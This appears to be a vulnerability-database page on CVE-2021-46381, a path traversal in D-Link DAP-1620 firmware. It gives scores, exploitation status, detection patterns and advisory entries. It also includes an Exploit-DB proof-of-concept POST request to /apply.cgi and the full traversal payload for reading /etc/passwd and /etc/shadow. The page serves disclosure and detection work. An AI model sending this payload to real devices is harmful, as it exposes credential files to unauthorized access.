CVE-2021-46381
published 2022-03-04CVE-2021-46381: Local File Inclusion due to path traversal in D-Link DAP-1620 leads to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].
PriorityP180high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
57.98%
99.0th percentile
Local File Inclusion due to path traversal in D-Link DAP-1620 leads to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].
Detection & IOCsextracted from sources · hover to see the quote
commandaction=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass↗
yara↗
regex: root:.*:0:0:
bytes↗
490a0046304402202af690770e9006f89e4de84567b484857812d481914449434b5245491daa68e202207f835a7d797095a8e3434d1cb6bf9526da49ff2771af10273bf0307896894b58:922c64590222798bb761d5b6d8e72950
- →Exploit targets POST /apply.cgi with action=do_graph_auth and a path-traversal sequence in the html_response_page parameter to read /etc/passwd or /etc/shadow. ↗
- →Successful exploitation returns content matching 'root:.*:0:0:' in the HTTP response body, indicating /etc/passwd was read. ↗
- →Monitor for POST requests to /apply.cgi containing '../' sequences in the html_response_page parameter, targeting /etc/passwd or /etc/shadow. ↗
- ·The exploit was tested specifically against D-Link DAP-1620 A1 hardware revision running firmware v1.01; other revisions or firmware versions may not be vulnerable. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-xjh5-4xm7-v6pc: Local File Inclusion due to path traversal in D-Link DAP-1620 leads to unauthorized internal files reading [/etc/passwd] and [/etc/shadow]
ghsa_unreviewed·2022-03-05
CVE-2021-46381 [HIGH] CWE-22 GHSA-xjh5-4xm7-v6pc: Local File Inclusion due to path traversal in D-Link DAP-1620 leads to unauthorized internal files reading [/etc/passwd] and [/etc/shadow]
Local File Inclusion due to path traversal in D-Link DAP-1620 leads to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].
VulnCheck
D-Link dap-1620_firmware Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2021·CVSS 7.5
CVE-2021-46381 [HIGH] D-Link dap-1620_firmware Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
D-Link dap-1620_firmware Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Local File Inclusion due to path traversal in D-Link DAP-1620 leads to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].
Affected: D-Link dap-1620_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2021-46381; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-23&host_type=src&vulnerability=cve-2021-46381; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/m
No detection rules found.
Exploit-DB
DLINK DAP-1620 A1 v1.01 - Directory Traversal
exploitdb·2022-05-11·CVSS 7.5
CVE-2021-46381 [HIGH] DLINK DAP-1620 A1 v1.01 - Directory Traversal
DLINK DAP-1620 A1 v1.01 - Directory Traversal
---
# Exploit Title: DLINK DAP-1620 A1 v1.01 - Directory Traversal
# Date: 27/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://me.dlink.com/consumer
# Version: DAP-1620 - A1 v1.01
# Tested on: Linux
# CVE : CVE-2021-46381
POST /apply.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://84.217.16.220/
Cookie: ID=634855649
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Content-Length: 281
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Host: 84.217.16.220
Connection: Keep-alive
action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_r
Nuclei
D-Link DAP-1620 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2021-46381 [HIGH] D-Link DAP-1620 - Local File Inclusion
D-Link DAP-1620 - Local File Inclusion
D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].
Template:
id: CVE-2021-46381
info:
name: D-Link DAP-1620 - Local File Inclusion
author: 0x_Akoko
severity: high
description: D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].
impact: |
An attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to further compromise of the device or network.
remediation: |
Apply the latest firmware update provided by D-Link to fix the local file inclusion vulnerability.
refere
http://packetstormsecurity.com/files/167070/DLINK-DAP-1620-A1-1.01-Directory-Traversal.htmlhttps://drive.google.com/drive/folders/19OP09msw8l7CJ622nkvnvnt7EKun1eCG?usp=sharinghttps://www.dlink.com/en/security-bulletin/http://packetstormsecurity.com/files/167070/DLINK-DAP-1620-A1-1.01-Directory-Traversal.htmlhttps://drive.google.com/drive/folders/19OP09msw8l7CJ622nkvnvnt7EKun1eCG?usp=sharinghttps://www.dlink.com/en/security-bulletin/
2022-03-04
Published
Exploited in the wild